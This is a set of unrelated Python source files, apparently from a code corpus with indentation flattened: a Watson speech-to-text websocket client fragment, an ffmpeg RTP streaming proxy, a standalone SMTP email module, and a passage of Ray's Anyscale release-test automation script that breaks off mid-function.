global isRestarting
global ws
global TIME_SINCE_RESPONSE
global TIME_AT_RESPONSE
while True:
try:
if(check_pid(int(sys.argv[2])) is False):
logging.warning("PitchPal termination detected, closing stream and websocket...")
ws.close()
os.kill(os.getpid(), 9)
except Exception as e:
logging.error("Monitor failed, error type " + type(e).__name__ + ": " + str(e))
logExecutionInfo()
try:
result = json.loads(ws.recv())
except Exception as e:
#logging.error("Receiving failed, error type " + type(e).__name__ + ": " + str(e))
#logExecutionInfo()
pass
print("----------")
if("results" in result):
print(result["results"][0]["alternatives"][0]["transcript"])
try:
overlayF = open(sys.argv[1]+"/overlay.txt", "w")
overlayF.write(result["results"][0]["alternatives"][0]["transcript"])
except Exception as e:
logging.error("Error writing to overlay buffer: " + str(e))
#TIME_AT_RESPONSE = time.time()
#logging.info("Time since last websocket response: " + str(time.time()-TIME_AT_RESPONSE))
def checkForTimeout():
global TIME_SINCE_RESPONSE
global TIME_AT_RESPONSE
while True:
TIME_SINCE_RESPONSE = time.time() - TIME_AT_RESPONSE
if(TIME_SINCE_RESPONSE > TIMEOUT_LIMIT):
logging.info("Timeout limit reached, restarting WS...")
try:
resetConnection()
except Exception as e:
logging.error("Could not reset connection: " + str(e))
TIME_AT_RESPONSE = time.time()
authorization = AuthorizationV1(
username=USERNAME,
password=PASSWORD)
token = authorization.get_token(url=SpeechToTextV1.default_url)
ws = create_connection('wss://stream.watsonplatform.net/speech-to-text/api/v1/recognize?watson-token=' +
token + '&model=en-US_BroadbandModel')
ws.send('{"action":"start","content-type":"audio/l16;rate=16000","interim_results":true,"inactivity_timeout":600}')
t3 = threading.Thread(target=receiveAudio)
t3.start()
#t4 = threading.Thread(target=checkForTimeout)
#t4.start()
getMicData()
t3.join()
#t4.join()
ws.close()
|
main.py | # -*- coding: utf-8 -*-
import os, sys, subprocess, threading, time, random
import socketserver, http.server
from queue import Queue, Empty
import urllib
class FFMpeg:
def __init__(self, addr):
self.addr = addr
self.fragSize = 8192
self.opts = None
self.buffer = Queue()
self.__STOPNOW__ = False
def __del__(self):
if(self.status == 'running'):
self.stop()
def start(self):
self.opts = ['ffmpeg.exe', '-i', self.addr, '-acodec', 'copy', '-vcodec', 'copy', '-frag_size', str(self.fragSize), '-f', 'mpegts', '-']
nullDev = open(os.devnull, 'wb')
self.ffmpeg = subprocess.Popen(self.opts, stdout=subprocess.PIPE, stderr=nullDev)
self.ffmpegThread = threading.Thread(target = self.fillBuffer, args=[])
self.ffmpegThread.start()
def stop(self, stopFlag = True):
if(self.opts is None):
raise RuntimeError('Already stopped.')
if(not self.__STOPNOW__):
self.__STOPNOW__ = stopFlag
while(self.__STOPNOW__):
pass
if(self.ffmpeg.poll() is None):
self.ffmpeg.kill()
self.ffmpegThread = None
self.ffmpeg = None
self.opts = None
self.buffer = Queue()
def status(self):
if(self.opts is None):
return 'stopped'
else:
return 'running'
def fillBuffer(self):
while(self.__STOPNOW__ == False and self.ffmpeg.poll() is None):
data = self.ffmpeg.stdout.read(self.fragSize)
self.buffer.put(data)
self.stop(stopFlag = False)
self.__STOPNOW__ = False
def getData(self):
return self.buffer.get(True, 10)
class Proxy(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
path = self.path.split('/')
path.remove('')
if(len(path) == 0):
self.send_response(404)
self.end_headers()
elif(len(path) == 1):
self.send_response(404)
self.end_headers()
elif(len(path) == 2):
if(path[0] == 'rtp'):
addr = 'rtp://%s' % (path[1])
else:
self.send_response(404)
self.end_headers()
return
self.send_response(200)
self.end_headers()
ffmpeg = FFMpeg(addr)
ffmpeg.start()
while((not self.server.stop) and ffmpeg.status() == 'running'):
try:
data = ffmpeg.getData()
except Empty:
break
try:
self.wfile.write(data)
except ConnectionResetError:
break
except ConnectionAbortedError:
break
if(ffmpeg.status() == 'running'):
ffmpeg.stop()
print("Connection Reset.", file=sys.stderr)
class Server:
def __init__(self, port):
self.port = port
self.httpd = None
def start(self):
self.httpd = socketserver.ThreadingTCPServer(('192.168.1.4', self.port), Proxy)
self.httpd.stop = False
threading.Thread(target=self.httpd.serve_forever).start()
print("HTTP server started at port {0}".format(self.port))
def stop(self):
if self.httpd:
self.httpd.stop = True
self.httpd.shutdown()
print("HTTP server stopped")
if __name__ == '__main__':
s = Server(8090)
s.start()
|
notifications.py | """
Standalone module for sending emails.
No dependencies outside of the Python standard library.
Author: Valtteri Rajalainen
"""
import smtplib
import ssl
import base64
import sys
import typing
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from threading import Thread
# for testing
mutex = None
def _load_credentials(filepath: str) -> typing.Tuple[str, str]:
"""
Open the provided filepath and read the credentials from it.
Expected format is: "EMAIL\nPASSWORD"
"""
with open(filepath) as file:
email = file.readline().strip()
password = file.readline().strip()
return email, password
def _write_email_to_stream(content: str, stream: typing.TextIO):
"""
Write email to the provided TextIO stream. The stream is not closed.
Content is expected to be valid email format: headers + '\n\n' + base64 encoded content.
"""
meta, content = content.split('\n\n')
stream.write(meta)
stream.write('\n\n')
stream.write(base64.b64decode(content).decode('utf-8'))
stream.write('\n')
stream.flush()
def send_email(message: dict, reciever: str, host: tuple, credentials_path: str, use_ssl=True):
"""
Send the email to the specified reciever using the host credentials for the smtp relay.
Message must be a dictionary. It is expected to have to entries: 'content' and 'subject'.
The 'content'-entry must be a tuple: (CONTENT_TEXT: str, CONTENT_TYPE: str)
The 'subject'-entrty is expected to be a simple string.
Host must be a tuple: (IP_ADDR: str, PORT: int).
If IP_ADDR is None, PORT is expected to be a file-like object,
where the email is written instead of sending it trough the network.
Credential path specifies the file where the email credentials can be readfrom.
Expected format for the file is: 'EMAIL_ADDR\nPASSWORD'
The actual sending of the email is done in separate thread. If the mutex is not None,
this separate thread acquires the lock while sending the email. This is useful in testing.
"""
addr, port = host
sender, password = _load_credentials(credentials_path)
content, content_type = message.get('content', ('', 'plain'))
mime_msg = MIMEText(content, content_type, _charset='utf-8')
mime_msg['Subject'] = message.get('subject', '')
mime_msg['From'] = sender
mime_msg['To'] = reciever
reply_to = message.get('reply-to', sender)
mime_msg.add_header('Reply-To', reply_to)
if addr is None:
_write_email_to_stream(mime_msg.as_string(), port)
return
server: typing.Union[smtplib.SMTP, smtplib.SMTP_SSL]
if use_ssl:
context = ssl.create_default_context()
server = smtplib.SMTP_SSL(addr, port, context=context)
else:
server = smtplib.SMTP(addr, port)
def send():
if mutex is not None:
mutex.acquire()
try:
if use_ssl:
server.login(sender, password)
server.sendmail(sender, reciever, mime_msg.as_string())
except smtplib.SMTPException as exc:
sys.stderr.write(str(exc))
finally:
if mutex is not None:
mutex.release()
server.quit()
Thread(target=send).start()
|
e2e.py | """
This is an end to end release test automation script used to kick off periodic
release tests, running on Anyscale.
The tool leverages app configs and compute templates.
Calling this script will run a single release test.
Example:
python e2e.py --test-config ~/ray/release/xgboost_tests/xgboost_tests.yaml --test-name tune_small
The following steps are then performed:
1. It will look up the test tune_small in the file xgboost_tests.yaml
2. It will fetch the specified app config and compute template and register
those with anyscale (if they don’t exist yet)
3. It waits until the app config is built
4. It then kicks off the script defined in the run block
5. When the script is finished, it will fetch the latest logs, the full log
output, and any artifacts specified in the artifacts block.
6. The full logs and artifacts will be stored in a s3 bucket
7. It will also fetch the json file specified in the run block as results.
This is the file where you should write your metrics to.
8. All results are then stored in a database.
Specifically it will store the following fields:
- Timestamp
- Test name
- Status (finished, error, timeout, invalid)
- Last logs (50 lines)
- results (see above)
- artifacts (links to s3 files)
Then the script exits. If an error occurs at any time, a fail result is
written to the database.
Writing a new release test
--------------------------
Each release test requires the following:
1. It has to be added in a release test yaml file, describing meta information
about the test (e.g. name, command to run, timeout)
2. You need an app config yaml
3. You need a compute template yaml
4. You need to define a command to run. This is usually a python script.
The command should accept (or ignore) a single optional
`--smoke-test` argument.
Usually the command should write its result metrics to a json file.
The json filename is available in the TEST_OUTPUT_JSON env variable.
5. Add your test in release/.buildkite/build_pipeline.py.
The script will have access to these environment variables:
"RAY_ADDRESS": os.environ.get("RAY_ADDRESS", "auto")
"TEST_OUTPUT_JSON": results_json_filename
"IS_SMOKE_TEST": "1" if smoke_test else "0"
For an example, take a look at the XGBoost test suite:
https://github.com/ray-project/ray/blob/master/release/xgboost_tests/xgboost_tests.yaml
These all use the same app configs and similar compute templates. This means
that app configs can be re-used across runs and only have to be built ones.
App configs and compute templates can interpret environment variables.
A notable one is the `RAY_WHEELS` variable which points to the wheels that
should be tested (e.g. latest master wheels). You might want to include
something like this in your `post_build_cmds`:
- pip3 install -U {{ env["RAY_WHEELS"] | default("ray") }}
If you want to force rebuilds, consider using something like
- echo {{ env["TIMESTAMP"] }}
so that your app configs changes each time the script is executed. If you
only want to trigger rebuilds once per day, use `DATESTAMP` instead:
- echo {{ env["DATESTAMP"] }}
Local testing
-------------
For local testing, make sure to authenticate with the ray-ossci AWS user
(e.g. by setting the respective environment variables obtained from go/aws),
or use the `--no-report` command line argument.
Also make sure to set these environment variables:
- ANYSCALE_CLI_TOKEN (should contain your anyscale credential token)
- ANYSCALE_PROJECT (should point to a project ID you have access to)
A test can then be run like this:
python e2e.py --no-report --test-config ~/ray/release/xgboost_tests/xgboost_tests.yaml --test-name tune_small
The `--no-report` option disables storing the results in the DB and
artifacts on S3. If you set this option, you do not need access to the
ray-ossci AWS user.
Using Compilation on Product + App Config Override
--------------------------------------------------
For quick iteration when debugging a release test, go/compile-on-product allows
you to easily modify and recompile Ray, such that the recompilation happens
within an app build step and can benefit from a warm Bazel cache. See
go/compile-on-product for more information.
After kicking off the app build, you can give the app config ID to this script
as an app config override, where the indicated app config will be used instead
of the app config given in the test config. E.g., running
python e2e.py --no-report --test-config ~/ray/benchmarks/benchmark_tests.yaml --test-name=single_node --app-config-id-override=apt_TBngEXXXrhipMXgexVcrpC9i
would run the single_node benchmark test with the apt_TBngEXXXrhipMXgexVcrpC9i
app config instead of the app config given in
~/ray/benchmarks/benchmark_tests.yaml. If the build for the app config is still
in progress, the script will wait until it completes, same as for a locally
defined app config.
Running on Head Node vs Running with Anyscale Connect
-----------------------------------------------------
By default release tests run their drivers on the head node. Support is being
added to run release tests that execute the driver as a subprocess and run
the workload on Anyscale product via Anyscale connect.
Note that when the driver in the test is a subprocess of releaser, releaser
cannot be terminated before the test finishes.
Other known feature gaps when running with Anyscale connect:
- Kicking off a test or checking progress is not supported.
- Downloading / uploading logs and artifacts are unsupported.
- Logs from remote may not have finished streaming, before the driver exits.
Long running tests
------------------
Long running tests can be kicked off with by adding the --kick-off-only
parameters to the e2e script. The status can then be checked with the
--check command.
Long running test sessions will be terminated after `timeout` seconds, after
which the latest result in the TEST_OUTPUT_JSON will be reported. Thus,
long running release tests should update this file periodically.
There are also two config options to configure behavior. The `time_key` is
needed to track the latest update of the TEST_OUTPUT_JSON and should contain
a floating point number (usually `time.time()`). The `max_update_delay` then
specified the maximum time in seconds that can be passed without an update
to the results json. If the output file hasn't been updated in e.g. 60 seconds,
this could indicate that the command is stale/frozen, and thus should fail.
Release test yaml example
-------------------------
- name: example
owner:
mail: "kai@anyscale.com" # Currently not used
slack: "@tune-team" # Currentl not used
cluster:
app_config: app_config.yaml # Relative to the release test yaml
compute_template: tpl_cpu.yaml
run:
timeout: 600 # in seconds
prepare: python wait_cluster.py 4 600 # prepare cmd to run before test
script: python workloads/train.py # actual release test command
# Only needed for long running test
time_key: last_update # Key in the results json indicating current time
max_update_delay: 30 # If state hasn't been updated in 30s, terminate
# This block is optional
artifacts:
# Artifact name: location on head node
- detailed_output: detailed_output.csv
# This block is optional. If present, the contents will be
# deep updated for smoke testing
smoke_test:
cluster:
compute_template: tpl_cpu_smoketest.yaml
""" # noqa: E501
import argparse
import boto3
import collections
import copy
import datetime
import hashlib
import jinja2
import json
import logging
import multiprocessing
import os
import requests
import shutil
import subprocess
import sys
import tempfile
import time
from queue import Empty
from typing import Any, Dict, Optional, Tuple, List
import yaml
import anyscale
import anyscale.conf
from anyscale.api import instantiate_api_client
from anyscale.controllers.session_controller import SessionController
from anyscale.sdk.anyscale_client.sdk import AnyscaleSDK
logger = logging.getLogger()
logger.setLevel(logging.INFO)
handler = logging.StreamHandler(stream=sys.stdout)
formatter = logging.Formatter(fmt="[%(levelname)s %(asctime)s] "
"%(filename)s: %(lineno)d "
"%(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
def getenv_default(key: str, default: Optional[str] = None):
"""Return environment variable with default value"""
# If the environment variable is set but "", still return default
return os.environ.get(key, None) or default
GLOBAL_CONFIG = {
"ANYSCALE_USER": getenv_default("ANYSCALE_USER",
"release-automation@anyscale.com"),
"ANYSCALE_HOST": getenv_default("ANYSCALE_HOST",
"https://beta.anyscale.com"),
"ANYSCALE_CLI_TOKEN": getenv_default("ANYSCALE_CLI_TOKEN"),
"ANYSCALE_CLOUD_ID": getenv_default(
"ANYSCALE_CLOUD_ID",
"cld_4F7k8814aZzGG8TNUGPKnc"), # cld_4F7k8814aZzGG8TNUGPKnc
"ANYSCALE_PROJECT": getenv_default("ANYSCALE_PROJECT", ""),
"RAY_VERSION": getenv_default("RAY_VERSION", "2.0.0.dev0"),
"RAY_REPO": getenv_default("RAY_REPO",
"https://github.com/ray-project/ray.git"),
"RAY_BRANCH": getenv_default("RAY_BRANCH", "master"),
"RELEASE_AWS_BUCKET": getenv_default("RELEASE_AWS_BUCKET",
"ray-release-automation-results"),
"RELEASE_AWS_LOCATION": getenv_default("RELEASE_AWS_LOCATION", "dev"),
"RELEASE_AWS_DB_NAME": getenv_default("RELEASE_AWS_DB_NAME", "ray_ci"),
"RELEASE_AWS_DB_TABLE": getenv_default("RELEASE_AWS_DB_TABLE",
"release_test_result"),
"RELEASE_AWS_DB_SECRET_ARN": getenv_default(
"RELEASE_AWS_DB_SECRET_ARN",
"arn:aws:secretsmanager:us-west-2:029272617770:secret:"
"rds-db-credentials/cluster-7RB7EYTTBK2EUC3MMTONYRBJLE/ray_ci-MQN2hh",
),
"RELEASE_AWS_DB_RESOURCE_ARN": getenv_default(
"RELEASE_AWS_DB_RESOURCE_ARN",
"arn:aws:rds:us-west-2:029272617770:cluster:ci-reporting",
),
"DATESTAMP": str(datetime.datetime.now().strftime("%Y%m%d")),
"TIMESTAMP": str(int(datetime.datetime.now().timestamp())),
"EXPIRATION_1D": str((datetime.datetime.now() +
datetime.timedelta(days=1)).strftime("%Y-%m-%d")),
"EXPIRATION_2D": str((datetime.datetime.now() +
datetime.timedelta(days=2)).strftime("%Y-%m-%d")),
"EXPIRATION_3D": str((datetime.datetime.now() +
datetime.timedelta(days=3)).strftime("%Y-%m-%d")),
}
REPORT_S = 30
def maybe_fetch_api_token():
if GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"] is None:
print("Missing ANYSCALE_CLI_TOKEN, retrieving from AWS secrets store")
# NOTE(simon) This should automatically retrieve
# release-automation@anyscale.com's anyscale token
GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"] = boto3.client(
"secretsmanager", region_name="us-west-2"
).get_secret_value(
SecretId="arn:aws:secretsmanager:us-west-2:029272617770:secret:"
"release-automation/"
"anyscale-token20210505220406333800000001-BcUuKB")["SecretString"]
class PrepareCommandRuntimeError(RuntimeError):
pass
class ReleaseTestTimeoutError(RuntimeError):
pass
class SessionTimeoutError(ReleaseTestTimeoutError):
pass
class FileSyncTimeoutError(ReleaseTestTimeoutError):
pass
class CommandTimeoutError(ReleaseTestTimeoutError):
pass
class PrepareCommandTimeoutError(ReleaseTestTimeoutError):
pass
class State:
def __init__(self, state: str, timestamp: float, data: Any):
self.state = state
self.timestamp = timestamp
self.data = data
sys.path.insert(0, anyscale.ANYSCALE_RAY_DIR)
def anyscale_project_url(project_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/projects/{project_id}" \
f"/?tab=session-list"
def anyscale_session_url(project_id: str, session_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/projects/{project_id}" \
f"/clusters/{session_id}"
def anyscale_compute_tpl_url(compute_tpl_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/configurations/cluster-computes" \
f"/{compute_tpl_id}"
def anyscale_app_config_build_url(build_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/configurations/app-config-details" \
f"/{build_id}"
def wheel_url(ray_version, git_branch, git_commit):
return f"https://s3-us-west-2.amazonaws.com/ray-wheels/" \
f"{git_branch}/{git_commit}/" \
f"ray-{ray_version}-cp37-cp37m-manylinux2014_x86_64.whl"
def wheel_exists(ray_version, git_branch, git_commit):
url = wheel_url(ray_version, git_branch, git_commit)
return requests.head(url).status_code == 200
def get_latest_commits(repo: str, branch: str = "master") -> List[str]:
cur = os.getcwd()
with tempfile.TemporaryDirectory() as tmpdir:
os.chdir(tmpdir)
clone_cmd = [
"git",
"clone",
"--filter=tree:0",
"--no-checkout",
# "--single-branch",
# "--depth=10",
f"--branch={branch}",
repo,
tmpdir,
]
log_cmd = [
"git",
"log",
"-n",
"10",
"--pretty=format:%H",
]
subprocess.check_output(clone_cmd)
commits = subprocess.check_output(log_cmd).decode(
sys.stdout.encoding).split("\n")
os.chdir(cur)
return commits
def find_ray_wheels(repo: str, branch: str, version: str):
url = None
commits = get_latest_commits(repo, branch)
logger.info(f"Latest 10 commits for branch {branch}: {commits}")
for commit in commits:
if wheel_exists(version, branch, commit):
url = wheel_url(version, branch, commit)
os.environ["RAY_WHEELS"] = url
logger.info(
f"Found wheels URL for Ray {version}, branch {branch}: "
f"{url}")
break
return url
def _check_stop(stop_event: multiprocessing.Event, timeout_type: str):
if stop_event.is_set():
if timeout_type == "prepare_command":
raise PrepareCommandTimeoutError(
"Process timed out in the prepare command stage.")
if timeout_type == "command":
raise CommandTimeoutError(
"Process timed out while running a command.")
elif timeout_type == "file_sync":
raise FileSyncTimeoutError(
"Process timed out while syncing files.")
elif timeout_type == "session":
raise SessionTimeoutError(
"Process timed out while starting a session.")
else:
assert False, "Unexpected timeout type."
def _deep_update(d, u):
for k, v in u.items():
if isinstance(v, collections.abc.Mapping):
d[k] = _deep_update(d.get(k, {}), v)
else:
d[k] = v
return d
def _dict_hash(dt: Dict[Any, Any]) -> str:
json_str = json.dumps(dt, sort_keys=True, ensure_ascii=True)
sha = hashlib.sha256()
sha.update(json_str.encode())
return sha.hexdigest()
def _load_config(local_dir: str, config_file: Optional[str]) -> Optional[Dict]:
if not config_file:
return None
config_path = os.path.join(local_dir, config_file)
with open(config_path, "rt") as f:
# Todo: jinja2 render
content = f.read()
env = copy.deepcopy(os.environ)
env.update(GLOBAL_CONFIG)
content = jinja2.Template(content).render(env=env)
return yaml.safe_load(content)
def has_errored(result: Dict[Any, Any]) -> bool:
return result.get("status", "invalid") != "finished"
def report_result(test_suite: str, test_name: str, status: str, logs: str,
results: Dict[Any, Any], artifacts: Dict[Any, Any],
category: str):
now = datetime.datetime.utcnow()
rds_data_client = boto3.client("rds-data", region_name="us-west-2")
schema = GLOBAL_CONFIG["RELEASE_AWS_DB_TABLE"]
sql = (
f"INSERT INTO {schema} "
f"(created_on, test_suite, test_name, status, last_logs, "
f"results, artifacts, category) "
f"VALUES (:created_on, :test_suite, :test_name, :status, :last_logs, "
f":results, :artifacts, :category)")
rds_data_client.execute_statement(
database=GLOBAL_CONFIG["RELEASE_AWS_DB_NAME"],
parameters=[
{
"name": "created_on",
"typeHint": "TIMESTAMP",
"value": {
"stringValue": now.strftime("%Y-%m-%d %H:%M:%S")
},
},
{
"name": "test_suite",
"value": {
"stringValue": test_suite
}
},
{
"name": "test_name",
"value": {
"stringValue": test_name
}
},
{
"name": "status",
"value": {
"stringValue": status
}
},
{
"name": "last_logs",
"value": {
"stringValue": logs
}
},
{
"name": "results",
"typeHint": "JSON",
"value": {
"stringValue": json.dumps(results)
},
},
{
"name": "artifacts",
"typeHint": "JSON",
"value": {
"stringValue": json.dumps(artifacts)
},
},
{
"name": "category",
"value": {
"stringValue": category
}
},
],
secretArn=GLOBAL_CONFIG["RELEASE_AWS_DB_SECRET_ARN"],
resourceArn=GLOBAL_CONFIG["RELEASE_AWS_DB_RESOURCE_ARN"],
schema=schema,
sql=sql,
)
def log_results_and_artifacts(result: Dict):
results = result.get("results", {})
if results:
msg = "Observed the following results:\n\n"
for key, val in results.items():
msg += f" {key} = {val}\n"
else:
msg = "Did not find any results."
logger.info(msg)
artifacts = result.get("artifacts", {})
if artifacts:
msg = "Saved the following artifacts:\n\n"
for key, val in artifacts.items():
msg += f" {key} = {val}\n"
else:
msg = "Did not find any artifacts."
logger.info(msg)
def _cleanup_session(sdk: AnyscaleSDK, session_id: str):
if session_id:
# Just trigger a request. No need to wait until session shutdown.
sdk.terminate_session(
session_id=session_id, terminate_session_options={})
def search_running_session(sdk: AnyscaleSDK, project_id: str,
session_name: str) -> Optional[str]:
session_id = None
logger.info(f"Looking for existing session with name {session_name}")
result = sdk.search_sessions(
project_id=project_id,
sessions_query=dict(name=dict(equals=session_name)))
if len(result.results) > 0 and result.results[0].state == "Running":
logger.info("Found existing session.")
session_id = result.results[0].id
return session_id
def create_or_find_compute_template(
sdk: AnyscaleSDK,
project_id: str,
compute_tpl: Dict[Any, Any],
_repeat: bool = True) -> Tuple[Optional[str], Optional[str]]:
compute_tpl_id = None
compute_tpl_name = None
if compute_tpl:
# As of Anyscale 0.4.1, it is an error to use the same compute template
# name within the same organization, between different projects.
compute_tpl_name = f"{project_id}/compute/{_dict_hash(compute_tpl)}"
logger.info(f"Tests uses compute template "
f"with name {compute_tpl_name}. Looking up existing "
f"templates.")
paging_token = None
while not compute_tpl_id:
result = sdk.search_compute_templates(
dict(
project_id=project_id,
name=dict(equals=compute_tpl_name),
include_anonymous=True),
paging_token=paging_token)
paging_token = result.metadata.next_paging_token
for res in result.results:
if res.name == compute_tpl_name:
compute_tpl_id = res.id
logger.info(
f"Template already exists with ID {compute_tpl_id}")
break
if not paging_token:
break
if not compute_tpl_id:
logger.info(f"Compute template not found. "
f"Creating with name {compute_tpl_name}.")
try:
result = sdk.create_compute_template(
dict(
name=compute_tpl_name,
project_id=project_id,
config=compute_tpl))
compute_tpl_id = result.result.id
except Exception as e:
if _repeat:
logger.warning(
f"Got exception when trying to create compute "
f"template: {e}. Sleeping for 10 seconds and then "
f"try again once...")
time.sleep(10)
return create_or_find_compute_template(
sdk=sdk,
project_id=project_id,
compute_tpl=compute_tpl,
_repeat=False)
raise e
logger.info(f"Compute template created with ID {compute_tpl_id}")
return compute_tpl_id, compute_tpl_name
def create_or_find_app_config(
sdk: AnyscaleSDK,
project_id: str,
app_config: Dict[Any, Any],
_repeat: bool = True) -> Tuple[Optional[str], Optional[str]]:
app_config_id = None
app_config_name = None
if app_config:
app_config_name = f"{project_id}-{_dict_hash(app_config)}"
logger.info(f"Test uses an app config with hash {app_config_name}. "
f"Looking up existing app configs with this name.")
paging_token = None
while not app_config_id:
result = sdk.list_app_configs(
project_id=project_id, count=50, paging_token=paging_token)
paging_token = result.metadata.next_paging_token
for res in result.results:
if res.name == app_config_name:
app_config_id = res.id
logger.info(
f"App config already exists with ID {app_config_id}")
break
if not paging_token or app_config_id:
break
if not app_config_id:
logger.info("App config not found. Creating new one.")
try:
result = sdk.create_app_config(
dict(
name=app_config_name,
project_id=project_id,
config_json=app_config))
app_config_id = result.result.id
except Exception as e:
if _repeat:
logger.warning(
f"Got exception when trying to create app "
f"config: {e}. Sleeping for 10 seconds and then "
f"try again once...")
time.sleep(10)
return create_or_find_app_config(
sdk=sdk,
project_id=project_id,
app_config=app_config,
_repeat=False)
raise e
logger.info(f"App config created with ID {app_config_id}")
return app_config_id, app_config_name
def install_app_config_packages(app_config: Dict[Any, Any]):
os.environ.update(app_config.get("env_vars", {}))
packages = app_config["python"]["pip_packages"]
for package in packages:
subprocess.check_output(["pip", "install", "-U", package], text=True)
def install_matching_ray():
wheel = os.environ.get("RAY_WHEELS", None)
if not wheel:
return
assert "manylinux2014_x86_64" in wheel, wheel
if sys.platform == "darwin":
platform = "macosx_10_15_intel"
elif sys.platform == "win32":
platform = "win_amd64"
else:
platform = "manylinux2014_x86_64"
wheel = wheel.replace("manylinux2014_x86_64", platform)
subprocess.check_output(["pip", "uninstall", "-y", "ray"], text=True)
subprocess.check_output(["pip", "install", "-U", wheel], text=True)
def wait_for_build_or_raise(sdk: AnyscaleSDK,
app_config_id: Optional[str]) -> Optional[str]:
if not app_config_id:
return None
# Fetch build
build_id = None
last_status = None
result = sdk.list_builds(app_config_id)
for build in sorted(result.results, key=lambda b: b.created_at):
build_id = build.id
last_status = build.status
if build.status == "failed":
continue
if build.status == "succeeded":
logger.info(f"Link to app config build: "
f"{anyscale_app_config_build_url(build_id)}")
return build_id
if last_status == "failed":
raise RuntimeError("App config build failed.")
if not build_id:
raise RuntimeError("No build found for app config.")
# Build found but not failed/finished yet
completed = False
start_wait = time.time()
next_report = start_wait + REPORT_S
logger.info(f"Waiting for build {build_id} to finish...")
logger.info(f"Track progress here: "
f"{anyscale_app_config_build_url(build_id)}")
while not completed:
now = time.time()
if now > next_report:
logger.info(f"... still waiting for build {build_id} to finish "
f"({int(now - start_wait)} seconds) ...")
next_report = next_report + REPORT_S
result = sdk.get_build(build_id)
build = result.result
if build.status == "failed":
raise RuntimeError(
f"App config build failed. Please see "
f"{anyscale_app_config_build_url(build_id)} for details")
if build.status == "succeeded":
logger.info("Build succeeded.")
return build_id
completed = build.status not in ["in_progress", "pending"]
if completed:
raise RuntimeError(
f"Unknown build status: {build.status}. Please see "
f"{anyscale_app_config_build_url(build_id)} for details")
time.sleep(1)
return build_id
def run_job(cluster_name: str, compute_tpl_name: str, cluster_env_name: str,
job_name: str, min_workers: str, script: str,
script_args: List[str], env_vars: Dict[str, str],
autosuspend: int) -> Tuple[int, str]:
# Start cluster and job
address = f"anyscale://{cluster_name}?cluster_compute={compute_tpl_name}" \
f"&cluster_env={cluster_env_name}&autosuspend={autosuspend}" \
"&&update=True"
logger.info(f"Starting job {job_name} with Ray address: {address}")
env = copy.deepcopy(os.environ)
env.update(GLOBAL_CONFIG)
env.update(env_vars)
env["RAY_ADDRESS"] = address
env["RAY_JOB_NAME"] = job_name
env["RAY_RELEASE_MIN_WORKERS"] = str(min_workers)
proc = subprocess.Popen(
script.split(" ") + script_args,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True)
proc.stdout.reconfigure(line_buffering=True)
logs = ""
for line in proc.stdout:
logs += line
sys.stdout.write(line)
proc.wait()
return proc.returncode, logs
def create_and_wait_for_session(
sdk: AnyscaleSDK,
stop_event: multiprocessing.Event,
session_name: str,
session_options: Dict[Any, Any],
) -> str:
# Create session
logger.info(f"Creating session {session_name}")
result = sdk.create_session(session_options)
session_id = result.result.id
# Trigger session start
logger.info(f"Starting session {session_name} ({session_id})")
session_url = anyscale_session_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"], session_id=session_id)
logger.info(f"Link to session: {session_url}")
result = sdk.start_session(session_id, start_session_options={})
sop_id = result.result.id
completed = result.result.completed
# Wait for session
logger.info(f"Waiting for session {session_name}...")
start_wait = time.time()
next_report = start_wait + REPORT_S
while not completed:
_check_stop(stop_event, "session")
now = time.time()
if now > next_report:
logger.info(f"... still waiting for session {session_name} "
f"({int(now - start_wait)} seconds) ...")
next_report = next_report + REPORT_S
session_operation_response = sdk.get_session_operation(
sop_id, _request_timeout=30)
session_operation = session_operation_response.result
completed = session_operation.completed
time.sleep(1)
return session_id
def run_session_command(sdk: AnyscaleSDK,
session_id: str,
cmd_to_run: str,
result_queue: multiprocessing.Queue,
env_vars: Dict[str, str],
state_str: str = "CMD_RUN") -> Tuple[str, int]:
full_cmd = " ".join(f"{k}={v}"
for k, v in env_vars.items()) + " " + cmd_to_run
logger.info(f"Running command in session {session_id}: \n" f"{full_cmd}")
session_url = anyscale_session_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"], session_id=session_id)
logger.info(f"Link to session: {session_url}")
result_queue.put(State(state_str, time.time(), None))
result = sdk.create_session_command(
dict(session_id=session_id, shell_command=full_cmd))
scd_id = result.result.id
return scd_id, result
def wait_for_session_command_to_complete(create_session_command_result,
sdk: AnyscaleSDK,
scd_id: str,
stop_event: multiprocessing.Event,
state_str: str = "CMD_RUN"):
result = create_session_command_result
completed = result.result.finished_at is not None
start_wait = time.time()
next_report = start_wait + REPORT_S
while not completed:
if state_str == "CMD_RUN":
_check_stop(stop_event, "command")
elif state_str == "CMD_PREPARE":
_check_stop(stop_event, "prepare_command")
now = time.time()
if now > next_report:
logger.info(f"... still waiting for command to finish "
f"({int(now - start_wait)} seconds) ...")
next_report = next_report + REPORT_S
result = sdk.get_session_command(session_command_id=scd_id)
completed = result.result.finished_at
time.sleep(1)
status_code = result.result.status_code
runtime = time.time() - start_wait
if status_code != 0:
if state_str == "CMD_RUN":
raise RuntimeError(
f"Command returned non-success status: {status_code}")
elif state_str == "CMD_PREPARE":
raise PrepareCommandRuntimeError(
f"Prepare command returned non-success status: {status_code}")
return status_code, runtime
def get_command_logs(session_controller: SessionController,
scd_id: str,
lines: int = 50):
result = session_controller.api_client.get_execution_logs_api_v2_session_commands_session_command_id_execution_logs_get( # noqa: E501
session_command_id=scd_id,
start_line=-1 * lines,
end_line=0)
return result.result.lines
def get_remote_json_content(
temp_dir: str,
session_name: str,
remote_file: Optional[str],
session_controller: SessionController,
):
if not remote_file:
logger.warning("No remote file specified, returning empty dict")
return {}
local_target_file = os.path.join(temp_dir, ".tmp.json")
session_controller.pull(
session_name=session_name,
source=remote_file,
target=local_target_file)
with open(local_target_file, "rt") as f:
return json.load(f)
def get_local_json_content(local_file: Optional[str], ):
